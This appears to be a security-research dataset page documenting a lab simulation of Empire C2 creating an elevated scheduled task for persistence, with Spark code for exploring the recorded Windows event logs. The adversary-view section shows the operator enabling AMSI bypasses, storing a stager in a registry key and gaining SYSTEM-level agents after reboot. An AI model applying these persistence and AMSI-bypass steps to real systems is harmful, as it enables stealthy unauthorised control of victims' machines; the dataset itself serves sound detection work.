Empire Elevated Scheduled Tasks

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/21

Modification Date

2020/09/21

Tactics

[‘TA0003’]

Techniques

[‘T1053.005’]

Tags

[‘Local Scheduled Tasks’]

Dataset Description

This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

schtasks

Adversary View

Empire: agents) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          
5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            
M43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            

4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4092   5/0.0    2020-09-21 21:57:21  http            

(Empire: agents) > interact 4SUZ8X62
(Empire: 4SUZ8X62) > usemodule persistence/elevated/schtasks*
(Empire: powershell/persistence/elevated/schtasks) > set AMSIBypass2 True
(Empire: powershell/persistence/elevated/schtasks) > set TaskName MordorElevated
(Empire: powershell/persistence/elevated/schtasks) > info

              Name: Invoke-Schtasks
            Module: powershell/persistence/elevated/schtasks
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) using schtasks running as
  SYSTEM. This has a moderate detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        4SUZ8X62                  Agent to run module on.                 
  Listener         False       http                      Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       True                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  DailyTime        False                                 Daily time to trigger the script        
                                                        (HH:mm).                                
  IdleTime         False                                 User idle time (in minutes) to trigger  
                                                        script.                                 
  OnLogon          False       True                      Switch. Trigger script on user logon.   
  TaskName         True        MordorElevated            Name to use for the schtask.            
  RegPath          False       HKLM:\Software\Microsoft  Registry location to store the script   
                              \Network\debug            code. Last element is the key name.     
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 4SUZ8X62 to run TASK_CMD_WAIT
[*] Agent 4SUZ8X62 tasked with task ID 1
[*] Tasked agent 4SUZ8X62 to run module powershell/persistence/elevated/schtasks
(Empire: powershell/persistence/elevated/schtasks) > 
SUCCESS: The scheduled task "MordorElevated" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with MordorElevated OnLogon trigger.

(Empire: powershell/persistence/elevated/schtasks) > back
(Empire: 4SUZ8X62) > shell shutdown /r
[*] Tasked 4SUZ8X62 to run TASK_SHELL
[*] Agent 4SUZ8X62 tasked with task ID 2
(Empire: 4SUZ8X62) > 
..Command execution completed.

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent Y2ADR48N checked in
[*] New agent D43KCT91 checked in
[+] Initial agent Y2ADR48N from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to Y2ADR48N at 172.18.39.5
[+] Initial agent D43KCT91 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to D43KCT91 at 172.18.39.5

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          
5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            
M43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            

4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            
Y2ADR48N ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         620    5/0.0    2020-09-21 22:01:50  http            
D43KCT91 ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         636    5/0.0    2020-09-21 22:01:51  http            

(Empire: agents) > 

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_schtasks_creation_execution_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |11898|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |8840 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |7645 |
|WORKSTATION5.theshire.local|security                            |4658   |4177 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |3114 |
|WORKSTATION5.theshire.local|security                            |5447   |2645 |
|WORKSTATION5.theshire.local|security                            |4656   |2142 |
|WORKSTATION5.theshire.local|security                            |4690   |2055 |
|WORKSTATION5.theshire.local|security                            |5154   |1798 |
|WORKSTATION5.theshire.local|security                            |5158   |1461 |
|WORKSTATION5.theshire.local|security                            |4663   |1384 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |1248 |
|WORKSTATION5.theshire.local|security                            |4703   |1048 |
|MORDORDC.theshire.local    |Security                            |4658   |846  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |623  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|11     |525  |
|WORKSTATION5.theshire.local|security                            |5156   |479  |
|MORDORDC.theshire.local    |Security                            |4690   |418  |
|MORDORDC.theshire.local    |Security                            |4656   |418  |
|MORDORDC.theshire.local    |Security                            |4663   |401  |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows